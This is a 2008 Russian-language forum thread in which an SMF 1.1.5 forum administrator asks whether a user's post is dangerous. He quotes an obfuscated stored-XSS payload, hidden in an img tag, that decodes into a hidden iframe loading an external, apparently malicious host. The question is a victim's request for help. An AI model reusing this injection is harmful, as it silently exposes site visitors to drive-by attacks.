Форумы Active XSS SMF 1.1.5

Discussion in 'Уязвимости CMS/форумов' started by mailbrush, 28 Jul 2008.

  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Западло

    Вот такую фигню сделал мне мой пользователь форума SMF 1.1.5 (написал сообщение)
    Что это и страшно ли? Я это увидел тока когда редактировал сообщение, при простом просмотре было просто
     
    #1 mailbrush, 28 Jul 2008
    Last edited: 28 Jul 2008
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Что это и страшно ли? Я это увидел тока когда редактировал сообщение, при простом просмотре было просто
    Значит сработал? И что эт именно за сплоит? Кукисы тырит?
     
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Вот в коде
    Code:
     [i*mg]http://<script>function v4766b41889697(v4766b41889a87){ function v4766b41889e64 () {return 16;} return(parseInt(v4766b41889a87,v4766b41889e64()));}function v4766b4188a634(v4766b4188aa1e){ function v4766b4188b5d6 () {return 2;} var v4766b4188ae03='';for(v4766b4188b1ec=0; v4766b4188b1ec<v4766b4188aa1e.length; v4766b4188b1ec+=v4766b4188b5d6()){ v4766b4188ae03+=(String.fromCharCode(v4766b41889697(v4766b4188aa1e.substr(v4766b4188b1ec, v4766b4188b5d6()))));}return v4766b4188ae03;} document.write(v4766b4188a634('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633939313965383662363539207372633D5C27687474703A2F2F73706C2E7669702D64646F732E6F72672F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A39383634292B27316133346237356138635C272077696474683D343131206865696768743D3234207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>[/im*g]